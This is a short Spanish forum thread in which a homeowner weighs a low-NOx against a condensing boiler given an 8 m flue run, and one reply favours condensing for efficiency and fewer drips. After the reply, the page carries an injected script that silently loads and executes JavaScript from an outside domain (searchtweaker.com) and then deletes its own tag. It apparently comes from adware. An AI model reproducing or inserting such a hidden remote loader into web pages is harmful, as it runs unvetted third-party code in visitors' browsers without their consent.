Evacuación de humos en calderas bajo NOx

Tengo que cambiar la caldera y estoy pidiendo presupuestos. Me han dado 2 soluciones diferentes (bajo NOx vs Condensación) y necesito ayuda para decidir cual es la más adecuada.

Mi situación es la siguiente:

Piso de menos de 60m2. Caldera situada en la cocina, sin ventana, por lo que hay que llevar los tubos de evacuación y toma de aire a la fachada. La longitud de los tubos (doble flujo) deberá ser de unos 8m cada uno (en 4 tramos con 4 codos).

La razón por la que me recomiendan Condensación es debido a la longitud de los tubos de evacuación de humos. Me dicen que, a pesar de lo que recomienda el fabricante, las calderas bajo NOx, con longitudes superiores a 4m siempre tienden a condensar y debería añadir a la instalación de la caldera algo que recogiera esas gotas de agua.

La ventaja de poner una de condensación es que, aunque tenga que conectarla con un desagüe, la caldera ya está preparada para "gestionar" esa situación.

1 respuesta

Respuesta

Si es así y mucha veces gotean por la juntas de union de los tubos, aparte de eso la caldera de condensación tiene mas rendimiento y si la pones a 70º en calefacción te ahorra mas gas que la nox

<script id="FoxLingoJs" type="text/javascript">// <![CDATA[(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();// ]]></script>